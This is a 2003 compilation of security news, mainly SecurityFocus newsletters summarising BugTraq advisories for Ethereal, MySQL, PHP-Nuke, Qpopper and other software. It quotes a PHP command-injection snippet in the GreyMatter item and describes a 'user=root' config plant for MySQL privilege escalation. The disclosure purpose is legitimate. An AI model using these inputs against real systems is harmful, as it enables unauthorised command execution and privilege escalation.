|
[News:] GN SecNews #6
|
Vijay Kumar
|
Mar 25, 2003 18:26 PST
|
GN SecNews Vol #6
-----------------
News Article Type: Weekly
Author: vijay (vijay-@users.sourceforge.net)
Date: Mon Mar 24 07:47:09 IST 2003
Please send in your comments and suggestions for improvement.
Disclaimer: This is a compilation of Security News Articles/Advisories from various GNU/Linux Providers, Developers and Users. The Author(s) of this article makes no warranties of any kind whatsoever with respect to the information contained from the sources. The information given here is as is from the source with the PGP signature if available.
===============================================================================
Contents
========
1.) SecurityFocus Linux Newsletter #123
2.) SecurityFocus Newsletter #188
3.) [SECURITY] [DSA 258-1] New ethereal packages fix arbitrary code execution
4.)MySQL user can be changed to root
5.)[RHSA-2003:062-11] Updated OpenSSL packages fix timing attack
===============================================================================
1.) SecurityFocus Linux Newsletter #123
===============================================================================
SecurityFocus Linux Newsletter #123
-----------------------------------
I. FRONT AND CENTER
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
2. IP Spoofing: An Introduction
3. Iraqi Cyberwar: an Ageless Joke
4. SecurityFocus DPP Program
II. LINUX VULNERABILITY SUMMARY
1. SimpleBBS Users.php Insecure File Permissions Vulnerability
2. Ethereal SOCKS Dissector Format String Vulnerability
3. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
4. MySQL mysqld Privilege Escalation Vulnerability
5. PHP-Nuke Multiple SQL Injection Vulnerabilities
6. MySQL Control Center Insecure Default File Permission...
7. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow...
8. Multiple PHP-Nuke Forums/Private_Messages SQL Injection...
9. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
10. Multiple Vendor 802.11b Authentication-Failed DOS...
11. GreyMatter WebLog Remote Command Execution Vulnerability
12. Man Program Unsafe Return Value Command Execution Vulnerability
13. Opera Long Filename Download Buffer Overrun Vulnerability
14. Qpopper Remote Memory Corruption Vulnerability
III. LINUX FOCUS LIST SUMMARY
1. Port 113 security (Thread)
2. Traffic Shaping. (Thread)
3. SecurityFocus Article Announcement (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
1. EverLink SRAC Gateway
2. iChain
3. NetOp Remote Control
V. NEW TOOLS FOR LINUX PLATFORMS
1. eXtended Allow - Deny list for PAM v0.4
2. C-Kermit v8.0.208
3. trafcalc v1.0
I. FRONT AND CENTER
-------------------
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
By Lance Spitzner
This is the second part of a three-part series looking at Honeyd, the
open source honeypot. In this paper we we will deploy Honeyd on the
Internet for one week and watch what happens. The intent is to test
Honeyd by letting real bad guys interact with and attack it. We will then
analyze how the honeypot performed and what it discovered
http://www.securityfocus.com/infocus/1675
2. IP Spoofing: An Introduction
by Matthew Tanase
Criminals have long employed the tactic of masking their true identity,
from disguises to aliases to caller-id blocking. It should come as no
surprise then, that criminals who conduct their nefarious activities on
networks and computers should employ such techniques. IP spoofing is one
of the most common forms of on-line camouflage. In IP spoofing, an
attacker gains unauthorized access to a computer or a network by making
it appear that a malicious message has come from a trusted machine by
spoofing” the IP address of that machine. In this article, we will
examine the concepts of IP spoofing: why it is possible, how it works,
what it is used for and how to defend against it.
http://www.securityfocus.com/infocus/1674
3. Iraqi Cyberwar: an Ageless Joke
By George Smith
Did U.S. infowar commandos smuggle a deadly computer virus into Iraq
inside a printer? Of course not. So why does it keep getting reported?
http://www.securityfocus.com/columnists/147
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
II. BUGTRAQ SUMMARY
-------------------
1. SimpleBBS Users.php Insecure File Permissions Vulnerability
BugTraq ID: 7045
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7045
Summary:
SimpleBBS is a freely available, open source PHP Bulletin Board. It is
available for the Unix and Linux operating systems.
SimpleBBS reportedly creates the user database 'users.php' with
world-readable permissions in the SimpleBBS web root. User credentials
are stored in plain text format. As a result anyone who may have access
to the SimpleBBS website may view stored user information contained in
the SimpleBBS user database.
This vulnerability was reported for SimpleBBS 1.0.6. It is not known if
earlier versions are affected by this vulnerability.
2. Ethereal SOCKS Dissector Format String Vulnerability
BugTraq ID: 7049
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7049
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The Ethereal SOCKS dissector is a mechanism for decoding the SOCKS
protocol. A format string vulnerability has been reported in some
versions of this dissector. The vulnerability exists in the
packet-socks.c source file.
An attacker can exploit this vulnerability by connecting to a vulnerable
SOCKS server and sending malicious format string specifiers to the SOCKS
server. If Ethereal is being used as a security tool to monitor network
packets, it is possible that sensitive memory may be corrupted.
This has been confirmed to result in a denial of service condition.
Additionally, it may be possible to cause Ethereal to execute malicious
attacker-supplied code.
This vulnerability affects Ethereal 0.9.9 and earlier.
3. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
BugTraq ID: 7050
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7050
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The NTLMSSP (NTLM Security Support Provider) dissector is a mechanism for
evaluating packets that use the NTLM protocol. A heap corruption
vulnerability has been reported for some versions of the dissector.
The precise technical details of this vulnerability are currently
unknown. This BID will be updated as further information is available.
An attacker may be able to exploit this vulnerability by crafting a
specially formed packet and sending it to a system using the NTLMSSP
dissector or by convincing a victim user to use Ethereal to read a
malformed packet trace file.
Due to the nature of this vulnerability it may be possible for an
attacker to create a situation in which sensitive memory could be
overwritten. If successful this may allow for the execution of arbitrary
code with the privileges of the Ethereal process.
This vulnerability affects Ethereal 0.9.9 and earlier.
4. MySQL mysqld Privilege Escalation Vulnerability
BugTraq ID: 7052
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7052
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered for MySQL that may allow the mysqld
service to start with elevated privileges.
MySQL uses a series of configuration files to set the privileges of the
service. The configuration files are typically stored in /etc/my.cnf,
DATADIR/my.cnf and ~/.my.cnf. When executed, the mysqld service reads
configuration information from /etc/my.cnf first, then DATADIR/my.cnf and
finally ~/.my.cnf.
An attacker can exploit this vulnerability by creating a DATADIR/my.cnf
that includes the line 'user=root' under the '[mysqld]' option section.
Furthermore, the ~/.my.cnf file must not exist.
When the mysqld service is executed, it will run as the root user instead
of the default user.
This may allow an attacker to obtain elevated privileges on a compromised
system.
This vulnerability was reported for MySQL 3.23.55.
5. PHP-Nuke Multiple SQL Injection Vulnerabilities
BugTraq ID: 7031
Remote: Yes
Date Published: Mar 06 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7031
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the
'Members_List' and 'Your_Account' modules of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain module functions. A remote attacker may take
advantage of these issues to inject malicious data into SQL queries,
possibly resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
6. MySQL Control Center Insecure Default File Permission Vulnerability
BugTraq ID: 7041
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7041
Summary:
MySQL Control Center (MySQLCC) is a visual administration interface for
MySQL database servers and is available for multiple platforms.
A vulnerability has been discovered in MySQLCC. The problem lies in the
permissions set on various files used by MySQLCC. Specifically,
configuration and connection files used by the application are set
world-readable. This may allow a malicious local user to obtain access to
sensitive information regarding various MySQL configuration settings.
Access to these files may allow an attacker to obtain information
required to carry out further attacks against a target system.
This issue has been addressed in MySQLCC 0.8.9.
7. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow Vulnerability
BugTraq ID: 7054
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7054
Summary:
DeleGate is an open source proxy server developed by Yutaka Sato.
DeleGate allows for proxying of several application protocols, including
HTTP. It is available for multiple platforms, including Microsoft
Windows and Unix and Linux variants.
The DeleGate HTTP Proxy component is prone to a remotely exploitable
buffer overflow vulnerability. This is due to insufficient bounds
checking of User-Agent: fields in remote 'robot.txt' files. It is
reported that it is possible to trigger this issue by specifying multiple
lines of User-Agent: data in the file, which will cause an internal array
of pointers to be overflowed with attacker-supplied data. This will
occur when a malicious 'robot.txt' file is retrieved via the proxy.
Successful exploitation may result in execution of malicious code in the
security context of the DeleGate proxy server.
This issue was reported in DeleGate versions 8.3.4 and 8.4.0. Other
versions may also be affected.
8. Multiple PHP-Nuke Forums/Private_Messages SQL Injection Vulnerabilities
BugTraq ID: 7060
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7060
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the Forums
scripts and 'Private_Messages' module of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain functions. A remote attacker may take advantage of
these issues to inject malicious data into SQL queries, possibly
resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
9. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
BugTraq ID: 7068
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7068
Summary:
SaveMyModem is mail filtering software. It is available for Microsoft
Windows and Unix and Linux platforms.
SaveMyModem is prone to a buffer overflow in the 'statusbar_set_text'
function. In some instances, this function will be called with
externally supplied data, such as when messages are processed. The
vulnerable function includes a call to vsnprintf(), specifying a source
buffer that is much larger than the destination buffer.
When the vulnerable function is called with externally supplied data, it
may be possible to corrupt sensitive regions of data. This may
potentially occur if a message is processed with an excessively long
subject.
Successful exploitation will result in code execution in the context of
the SaveMyModem process.
10. Multiple Vendor 802.11b Authentication-Failed Denial Of Service Vulnerability
BugTraq ID: 7069
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7069
Summary:
A vulnerability has been reported in some operating systems that are
capable of handling 802.11b traffic. This issue has been reported as
affecting Linux and Microsoft Windows operating systems.
Some operating systems do not handle specific types of 802.11b traffic
properly. Upon receiving maliciously crafted packets, the client driver
may drop all active sessions and fail. A reboot may be required to
resume normal functionality.
The problem is in the handling of Authentication-Failed packets. By
sending a Authentication-Failed packet to a host with a reason code of
failed authentication that has previously occurred, a host may react
unpredictably, dropping all sessions, and the client software potentially
failing. It should be noted that the source and destination MAC
addresses of the Authentication-Failed packets are spoofed to appear as
though their origin is the Wireless Access Point.
The attack is typically performed by sending the packets directly to a
802.11b client. Therefore, this type of attack will evade network
intrusion detection, and may additionally circumvent WEP.
11. GreyMatter WebLog Remote Command Execution Vulnerability
BugTraq ID: 7055
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7055
Summary:
GreyMatter WebLog is an open source weblog software package available for
the Unix and Linux operating systems.
A problem in the software may allow unauthorized access to systems using
the vulnerable software.
It has been reported that a problem in GreyMatter weblog may allow
unauthorized access to systems. Due to improper sanitization of
untrusted input, it may be possible for a remote user to execute commands
on the local system.
The problem is in the handling of user comments by the weblog software.
Due to improper sanitization of the input passed through the weblog
comments fields, an attacker could potentially insert specially crafted
commands such as <?php system(echo($cmd)) ?>. This would in turn result
in the execution of these commands with the privileges of the web server
process.
12. Man Program Unsafe Return Value Command Execution Vulnerability
BugTraq ID: 7066
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7066
Summary:
Man is a freely available, open source manual page program. It is
available mainly for Linux operating systems, though it can be used on
other UNIX operating system variants.
A problem with the program may make it possible to launch local attacks
on users through malicious man pages.
It has been reported that the man program does not properly handle some
types of input. When a man page is processed that could pose a potential
security risk, the program reacts in a way that may open a window of
opportunity for an attacker to execute arbitrary commands.
The problem is in the value returned by the man program when a
potentially dangerous man page is processed. The man program returns the
string 'unsafe' which is in turn passed to a system() call. If a program
located in the user's path was named 'unsafe' the program would be
executed with the privileges of the man program user.
13. Opera Long Filename Download Buffer Overrun Vulnerability
BugTraq ID: 7056
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7056
Summary:
Opera is a web browser available for a number of platforms, including
Microsoft Windows, Linux and Unix variants and Apple MacOS.
A vulnerability has been discovered in various versions of Opera on the
Microsoft Windows platform.
When specific types of files are downloaded by Opera, the transfer is
displayed within a 'Download Dialog'. Due to insufficient bounds checking
when processing the requested filename, it may be possible for memory to
be corrupted.
Specifically, when a filename is to be displayed within the 'Download
Dialog' the type of file must be verified. When this occurs, the filename
in question is copied into a static buffer on the stack.
By hosting a downloadable file containing a name of excessive length, it
may be possible for an attacker to overwrite sensitive memory locations
within Opera. Successful exploitation of this issue would result in the
execution of arbitrary attacker-supplied commands.
It should be noted that this issue affects Opera versions 6 and 7 on the
Microsoft Windows platform.
14. Qpopper Remote Memory Corruption Vulnerability
BugTraq ID: 7058
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7058
Summary:
Qpopper is a POP3 mail server available for Linux and Unix based systems.
A vulnerability has been discovered when calling the 'mdef' command. The
issue presents itself due to the incorrect assumption of the Qvsnprintf()
function. The function is meant to be a replacement for the C function
vsnprintf() but, unlike the latter function, Qvsnprintf() fails to NULL
terminate buffers.
A memory corruption vulnerability has been discovered in Qpopper when
processing a malicious 'mdef' command, as a result of the lack of NULL
termination by Qvsnprintf(). The vulnerability specifically occurs in the
pop_msg() function when filling the 'message' buffer with a user-supplied
macro name. The pop_msg() function incorrectly assumes that the 'message'
buffer will be null terminated after being filled via the Qvsnprintf()
function. A CRLF sequence and null terminator (CRLF+N) is later appended
to the data which may overwrite memory at a location adjacent to the
buffer.
By exploiting this to overwrite the LSB of a saved frame pointer, it is
possible to influence the program in such a way that attacker-supplied
instructions can be executed.
This vulnerability affects Qpopper versions 4.0.4 and earlier. It should
be noted that the exploitability of this issue is highly dependant on the
memory layout, which will likely be influenced by compiler optimization.
III. LINUX FOCUS LIST SUMMARY
----------------------------
1. Port 113 security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314827
2. Traffic Shaping. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314730
3. SecurityFocus Article Announcement (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314566
IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. EverLink SRAC Gateway
by Anyware Technology
Platforms: N/A
Relevant URL:
http://www.anywareusa.com/products/srac_gateway.htm
Summary:
EverLink SRAC Gateway is a high performance network appliance that
integrates many security technologies into a simple network device.
Operating at the application layer, the Gateway allows enterprises to
build fully secured Virtual Private Network as easy as PLUG AND PLAY. By
incorporating all authentication methods, including PKI and dynamic
password, the Gateway provides the most thorough check of a user's
identity. For those who have installed VPNs, the Gateway provides
enterprises with significant added functionalities and security features
to instantly accommodate mobile users anywhere in the world.
2. iChain
by Novell
Platforms: N/A
Relevant URL:
http://www.novell.com/products/ichain/
Summary:
iChain provides identity-based web security services that control access
to application and network resources across technical and organizational
boundaries, as one Net.
3. NetOp Remote Control
by CrossTec Corporation
Platforms: DOS, Linux, OS/2, Windows 2000, Windows 95/98, Windows CE,
Windows NT, Windows XP
Relevant URL:
http://www.crossteccorp.com/netopremote/index.html
Summary:
With New NetOp Remote Control v7.5 you can easily reach any Windows,
Linux, Sun Solaris or legacy OS/2 and DOS PC from your desktop or even
via any Internet connected PC via our new IE browser Guest. View the
remote PC's screen, control its keyboard and mouse, synchronize files,
inventory its hardware and software, launch applications or chat with
someone at the remote PC -- just as if you were seated at that computer.
V. NEW TOOLS FOR LINUX PLATFORMS
---------------------------------
eXtended Allow - Deny list for PAM v0.4
by Adrian Ber berad-@yahoo.com
Relevant URL:
http://www.geocities.com/beradrian/soft/xad/index.html
Platforms: Linux, POSIX
Summary:
XAD is a very easy to configure PAM module. Through a very easy language
you can allow/deny access to users.
2. C-Kermit v8.0.208
by Frank da Cruz
Relevant URL:
http://www.columbia.edu/kermit/ckermit.html
Platforms: AIX, FreeBSD, HP-UX, Linux, MacOS, NetBSD, OpenBSD, SCO,
Solaris, SunOS
Summary:
C-Kermit is a combined serial and network communication software package
offering a consistent, medium-independent, cross-platform approach to
connection establishment, terminal sessions, file transfer, character-set
translation, numeric and alphanumeric paging, and automation of
communication tasks. Recent versions include FTP and HTTP clients as well
as an SSH interface, all of which can be scripted and aware of
character-sets. It supports built-in security methods, including Kerberos
IV, Kerberos V, SSL/TLS, and SRP, FTP protocol features such as MLSD, and
source-code parity with Kermit 95 2.1 for Windows and OS/2.
3. trafcalc v1.0
by cyberny
Relevant URL:
http://trafcalc.sourceforge.net/
Platforms: Linux, POSIX
Summary:
Trafcalc calculates the size of the TCP-payload on a system via packet
capturing and connection tracking at the user level instead of the IP
level.
===============================================================================
End of Doc #1
===============================================================================
===============================================================================
2.)SecurityFocus Newsletter #188
===============================================================================
SecurityFocus Newsletter #188
-----------------------------
This Issue is Sponsored By: NetIQ
Need security policies? Don't start from scratch..."Information Security
Policies Made Easy" is the best security policy resource guide you can
buy with 1300+ ready-to-use security policies that can be quickly
customized for any company. Build best practice security policies in
half the time and expense. Also check out "Information Security Roles &
Responsibilities Made Easy. "
Download a free policy now at http://www.netiq.com/order/publications.asp
------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
2. IP Spoofing: An Introduction
3. Iraqi Cyberwar: an Ageless Joke
4. SecurityFocus DPP Program
II. BUGTRAQ SUMMARY
1. DBTools DBManager Professional Information Disclosure Weakness
2. MySQL Control Center Insecure Default File Permission...
3. NetScreen ScreenOS Loss of Configuration Vulnerability
4. Wordit Logbook Logbook.pl Remote Command Execution Vulnerability
5. Clearswift MailSweeper Malformed MIME Attachment Filter Bypass...
6. SimpleBBS Users.php Insecure File Permissions Vulnerability
7. Microsoft Windows XP Safe Mode Policy Bypass Weakness
8. PostNuke Phoenix Member_List Module SQL Injection Vulnerability
9. PostNuke Phoenix Theme Handling Remote Code Execution...
10. Ethereal SOCKS Dissector Format String Vulnerability
11. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
12. Upload Lite Arbitrary File Upload Vulnerability
13. MySQL mysqld Privilege Escalation Vulnerability
14. PeopleSoft PeopleTools SchedulerTransfer Remote Command
15. GreyMatter WebLog Remote Command Execution Vulnerability
16. Microsoft Internet Explorer .MHT File Buffer Overflow...
17. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow...
18. Opera Long Filename Download Buffer Overrun Vulnerability
19. Qpopper Remote Memory Corruption Vulnerability
20. SMC Router Backup Tool Plaintext Password Weakness
21. LXR Cross-Referencer Arbitrary File Disclosure Vulnerability
22. Multiple PHP-Nuke Forums/Private_Messages SQL Injection...
23. VPOPMail vpopmail.php Remote Command Execution Vulnerability
24. HP VVOS 11.04 HFS Unauthorized Access Vulnerability
25. Sun SUNWlldap Library Hostname Buffer Overflow Vulnerability
26. Man Program Unsafe Return Value Command Execution Vulnerability
27. Multitech RouteFinder Remote Memory Corruption Vulnerability
28. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
29. HP J6038A JetDirect 310x Print Server For Fast Ethernet...
III. SECURITYFOCUS NEWS ARTICLES
1. Hi-Tech Surveillance Firm Prospers
2. Homeland Cybersecurity Efforts Doubted
3. RSA and Verisign beat SSL patent infringement rap
4. For sale: memory stick plus cancer patient records
IV.SECURITYFOCUS TOP 6 TOOLS
1. KisMAC v0.04a
2. psmon v1.0.0
3. eXtended Allow - Deny list for PAM v0.4
4. C-Kermit v8.0.208
5. trafcalc v1.0
6. Ish v1.5.1
V. SECURITYJOBS LIST SUMMARY
1. Looking for Disaster Recovery Analyst for Los Angeles CA (Thread)
2. Any hints for Australia? (Thread)
3. Experienced Security Professional looking for Bay Area...
4. Experienced Security Software consultant, CISSP (Thread)
5. INFOSEC Systems Engineer (Thread)
6. FW: IT Security Evangelist for Italy (Thread)
7. Senior Security Engineer/Analyst (Thread)
8. Senior Engineering Manager-Security (Thread)
9. Systems Engineer-Chicago, Minneapolis, Houston and St. Louis...
10. Information Security Manager, UK (Thread)
11. Security Engineer (Thread)
12. Security Awareness & Training Manager vacancy (Thread)
13. Account Executive (Thread)
14. Looking for a job in England (Thread)
15. Sales Engineer, APac (Thread)
16. Senior Level Security Consultant needed in DC (Thread)
17. RACF Project Sought - 20 Year Veteran Supporting RACF DB2...
18. PFR Thread (Thread)
VI. INCIDENTS LIST SUMMARY
1. CodeRed Observations. (Thread)
2. New article announcement: Open Source Honeypots, Part Two...
3. unidentified DOS "bad traffic" (Thread)
4. Defaced website listing... (Thread)
5. Windows Rootkits/API Hooking (Thread)
6. [unisog] Re: Port 109 Mystery (Thread)
7. FW: CodeRed Observations. (Thread)
8. CANADA.EXE Findings (Thread)
9. tcp/25 (smtp) and tcp/24942 (unk) (Thread)
10. Port 109 Mystery (Thread)
11. [unisog] Port 109 Mystery (Thread)
12. The Return of Code Red II? (Thread)
13. Hosts File "Girlnextdoor_" (Thread)
14. DeLoder technical analysis (Thread)
15. against illegal arp update (Thread)
16. Solved !! "Girlnextdoor_" TCP Ports 1025/1028 (Thread)
17. FW: Alert: New Code Red F worming its way through the 'net...
18. SV: The Return of Code Red II? (Thread)
19. Possibly Unknown Virus? (Thread)
20. CANADA.EXE program (Thread)
21. [Snort-sigs] Snort Signatures for LSD-PL.NET Exploit (Thread)
22. Unknown attack, possible trojan? (Thread)
23. [Full-Disclosure] Bypassing Black Ice PC protection? (Thread)
24. worm/Trojans are taking advantage of default path of Windows...
25. Real-world attacks on sendmail CA-2003-07 seen (Thread)
26. Port 3335 (Thread)
27. W2K Compromise - PipeCmdSrv (Thread)
28. UPDATE: Possibly Unknown Virus? Care to help me analyze?!?...
29. Possibly Unknown Virus? Care to help me analyze?!? (Thread)
30. sendmail exploit or ill formatted spam (Thread)
31. Snort Signatures for LSD-PL.NET Exploit (Thread)
32. Increase in Scans of Port 445? (Thread)
33. New virus outbreak. (Thread)
34. Solved !! "Girlnextdoor_" TCP Ports 1025/1028 (Thread)
35. Bypassing Black Ice PC protection? (Thread)
36. new ddos client? (Thread)
37. New virus outbreak? (Thread)
38. Open mail relay surge (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Outlook HTML crash (Thread)
2. su core dumped with signal 3. BSD/OS 3.0, 3.1 (Thread)
3. Win32hlp exploit for : ":LINK overflow" (Thread)
4. Apache 2.x leaked descriptors (Thread)
5. gtali Segmentation fault (Thread)
6. FW: Outlook HTML crash (Thread)
7. Mordred Security Labs now online (Thread)
8. xscreensaver exploit for Redhat 7.3 (Thread)
9. Windows Shellcode - Using Detached_Process flag (Thread)
10. Why SUID Binary exploit does not yield root shell? (Thread)
11. /usr/sbin/sendmail (Thread)
12. Fwd: Kazaa file corruption (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. SQL Service Pack doesn't upgrade SQL Server (Thread)
2. Exchange/MAPI/RPC (Thread)
3. DisableIPSourceRouting registry key (Thread)
4. SecurityFocus Microsoft Newsletter #128 (Thread)
5. AW: Exchange/MAPI/RPC (Thread)
6. SV: DisableIPSourceRouting registry key (Thread)
7. Worm.Dvldr analysis report (Thread)
8. Article Announcement: Cryptographic Filesystems: Design and...
9. Free SQL chapter available on www.SpecialOpsSecurity.com (Thread)
10. AD replication - IP site to site encryption? (Thread)
11. User rights on Terminal Services (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Solaris disk wipe utilitiy? (Thread)
2. Sun Security Admin Beta Exam.... (Thread)
3. SecurityFocus Article Announcement - Cryptographic Filesystems...
4. Kernel modules (Thread)
5. Administrivia (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Port 113 security (Thread)
2. Traffic Shaping. (Thread)
3. SecurityFocus Article Announcement (Thread)
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
By Lance Spitzner
This is the second part of a three-part series looking at Honeyd, the
open source honeypot. In this paper we we will deploy Honeyd on the
Internet for one week and watch what happens. The intent is to test
Honeyd by letting real bad guys interact with and attack it. We will then
analyze how the honeypot performed and what it discovered
http://www.securityfocus.com/infocus/1675
2. IP Spoofing: An Introduction
by Matthew Tanase
Criminals have long employed the tactic of masking their true identity,
from disguises to aliases to caller-id blocking. It should come as no
surprise then, that criminals who conduct their nefarious activities on
networks and computers should employ such techniques. IP spoofing is one
of the most common forms of on-line camouflage. In IP spoofing, an
attacker gains unauthorized access to a computer or a network by making
it appear that a malicious message has come from a trusted machine by
spoofing” the IP address of that machine. In this article, we will
examine the concepts of IP spoofing: why it is possible, how it works,
what it is used for and how to defend against it.
http://www.securityfocus.com/infocus/1674
3. Iraqi Cyberwar: an Ageless Joke
By George Smith
Did U.S. infowar commandos smuggle a deadly computer virus into Iraq
inside a printer? Of course not. So why does it keep getting reported?
http://www.securityfocus.com/columnists/147
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
II. BUGTRAQ SUMMARY
-------------------
1. DBTools DBManager Professional Information Disclosure Weakness
BugTraq ID: 7040
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7040
Summary:
DBManager Professional is database management software for MySQL and
PostgreSQL. It is available for Microsoft Windows operating systems.
Sensitive DBManager Professional configuration information, including
authentication credentials, is stored in plaintext on the system hosting
the software. This information is typically stored in the "catalog.mdb"
in the "DATA" directory of the program folder.
It has been reported that this information may also be readable by other
local users in the default installation of the software. As a result,
sensitive information which is sufficient to compromise the database may
be exposed to malicious local users.
2. MySQL Control Center Insecure Default File Permission Vulnerability
BugTraq ID: 7041
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7041
Summary:
MySQL Control Center (MySQLCC) is a visual administration interface for
MySQL database servers and is available for multiple platforms.
A vulnerability has been discovered in MySQLCC. The problem lies in the
permissions set on various files used by MySQLCC. Specifically,
configuration and connection files used by the application are set
world-readable. This may allow a malicious local user to obtain access to
sensitive information regarding various MySQL configuration settings.
Access to these files may allow an attacker to obtain information
required to carry out further attacks against a target system.
This issue has been addressed in MySQLCC 0.8.9.
3. NetScreen ScreenOS Loss of Configuration Vulnerability
BugTraq ID: 7042
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7042
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
Under certain circumstances, the device may lose its configuration during
periods of heavy load.
When the configuration is lost, the device will revert to its factory
configuration settings, which rejects all inbound traffic on the
untrusted interface. At the same time, the device will NAT all traffic
on the trusted interface to the untrusted interface. The external
network will not be accessible to the internal network since the device
no longer has a default route defined. This results in a denial of
service to external hosts requiring access to resources behind the device
and internal hosts requiring access to resources on the external network.
In addition, if the default settings are considered insecure, this
condition may result in an exposure.
4. Wordit Logbook Logbook.pl Remote Command Execution Vulnerability
BugTraq ID: 7043
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7043
Summary:
Wordit Logbook is a web-based journal implemented in Perl.
Wordit Logbook is prone to a remote command execution vulnerability. This
issue is present in the 'logbook.pl' script.
Logbook does not sufficiently sanitize user-supplied input. Data supplied
via the 'file' URI parameter will be passed to a Perl open() call. As a
result, it may be possible for a remote attacker to execute arbitrary
commands in the context of the web server process.
A remote attacker may exploit this condition to gain local, interactive
access to the underlying host.
This vulnerability was reported to affect Wordit Logbook version 098b3
previous versions may also be affected.
5. Clearswift MailSweeper Malformed MIME Attachment Filter Bypass Vulnerability
BugTraq ID: 7044
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7044
Summary:
ClearSwift MailSweeper is an SMTP gateway email filtering product. It
allows filtering based on email content, source, destination and
attachments.
MailSweeper fails to filter certain types of malformed MIME attachments,
allowing potentially malicious attachments through.
RFC 2045 states that if a MIME-Version field is absent, the receiving
mail agent may choose to interpret the body of the message in order to
determine the content since it cannot be assumed that all non-MIME
messages are in US-ASCII plain text.
If an executable attachment does not contain a MIME-Version field,
MailSweeper does not attempt to interpret the content type of the MIME
attachment. MailSweeper then fails to identify the attachment as being
an executable file type and allows it through the filter. This could
